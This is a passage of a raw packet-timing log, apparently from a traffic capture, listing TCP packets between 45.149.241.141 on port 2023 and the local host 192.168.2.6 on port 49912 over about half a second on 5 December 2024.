                                                                                                              Dec 5, 2024 10:39:28.563836098 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.563941002 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.564225912 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.565021992 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.565135002 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.565305948 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.566071033 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.566291094 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.566627026 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.567253113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.567444086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.567574024 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.568413973 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.568511963 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.569031954 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.569524050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.569634914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.569845915 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.570672989 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.570749044 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.571224928 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.571799994 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.571980000 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.572141886 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.572963953 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.573091984 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.573796988 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.574112892 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.574219942 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.574543953 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.575642109 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.575788975 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.575926065 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.576721907 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.576744080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.576833963 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.577536106 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.577656031 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.577771902 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.578696012 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.578775883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.578890085 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.579807997 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.579974890 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.580218077 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.580959082 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.581053972 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.581172943 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.582101107 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.582201958 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.582421064 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.583338022 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.583513975 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.583583117 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.584403038 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.584495068 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.584592104 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.585529089 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.585570097 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.585655928 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.586678982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.586869001 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.587024927 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.587908983 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.588000059 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.588114977 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.588993073 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.589085102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.589338064 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.590137959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.590225935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.590425968 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.591264963 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.591360092 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.591468096 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.592403889 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.592509985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.592595100 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.593606949 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.593704939 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.593919039 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.594690084 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.594870090 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.595571041 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.595823050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.595932961 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.597048998 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.597165108 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.597239971 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.597388983 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.598119974 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.598182917 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.598330975 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.599276066 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.599293947 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.599555016 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.600409985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.600505114 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.600702047 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.601522923 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.601644039 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.601703882 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.602679968 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.711647987 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.734864950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.735057116 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.735167980 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.735398054 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.735553980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.735733986 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.736546040 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.736840010 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.737761021 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.737797976 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.737828970 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.738259077 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.738814116 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.738949060 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.738986969 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.739954948 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.740058899 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.740159988 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.741082907 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.741159916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.741235971 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.742280960 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.742353916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.742672920 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.743432999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.743511915 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.743844986 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.744628906 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.744642019 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.744745016 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.745697021 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.745817900 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.746259928 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.746890068 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.747011900 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.747100115 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.748048067 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.748151064 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.748313904 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.749103069 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.749165058 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.749274969 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.750257969 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.750366926 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.750461102 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.751478910 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.751658916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.751833916 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.752590895 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.752675056 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.752773046 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.753714085 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.753870964 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.754874945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.754987955 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.755004883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.755157948 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.755970001 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.756127119 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.757121086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.757214069 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.757245064 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.757445097 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.758260965 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.758363962 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.759412050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.759533882 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.759711981 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.760564089 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.760684013 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.760807991 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.761715889 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.761909962 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.762387037 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.762851954 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.762917042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.763163090 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.763968945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.764110088 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.764180899 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.765158892 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.765330076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.765652895 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.766257048 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.766433954 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.766753912 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.767409086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.767479897 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.767627954 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.768570900 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.768682957 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.769082069 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.769726992 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.769874096 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.770172119 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.770839930 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.770947933 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.771207094 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.771998882 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.772193909 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.772469997 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.773128033 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.773236990 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.773283958 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.774262905 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.774418116 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.774532080 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.775443077 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.775583982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.775665998 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.776576996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.776675940 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.776918888 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.777729988 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.777887106 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.777935982 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.778892994 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.779051065 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.779968023 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.780014992 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.780096054 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.780204058 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.781292915 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.781383038 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.781450987 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.782252073 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.782378912 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.782780886 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.783415079 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.783530951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.783713102 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.784713984 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.784898043 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.785100937 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.785747051 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.785857916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.786915064 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.787031889 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.787051916 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.787194967 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.788007975 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.788111925 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.789216995 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.789316893 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.789345026 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.789412975 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.790283918 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.790369034 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.790997982 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.791485071 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.791543961 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.791748047 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.792558908 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.792660952 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.793016911 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.793728113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.793904066 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.794248104 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.794922113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.927094936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.927180052 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.927186966 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.927648067 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.927778959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.927822113 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.928781986 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.928869009 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.928917885 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.930005074 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.930125952 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.930174112 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.931155920 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.931288958 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.931333065 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.932404041 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.932499886 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.932526112 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.933320999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.933412075 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.933443069 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.934562922 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.934705019 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.934720993 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.935636997 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.935796976 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.935926914 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.936918974 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.937112093 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.937282085 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.937990904 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.938158035 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.938245058 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.939172983 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.939202070 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.939418077 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.940216064 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.940434933 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.940542936 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.941515923 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.941545963 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.941589117 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.942472935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.942579985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.942600012 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.943655968 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.943748951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.943785906 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.944745064 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.944865942 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.944909096 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.945936918 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.946011066 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.946044922 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.947072983 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.947173119 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.947413921 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.948188066 CET20234991245.149.241.141192.168.2.6
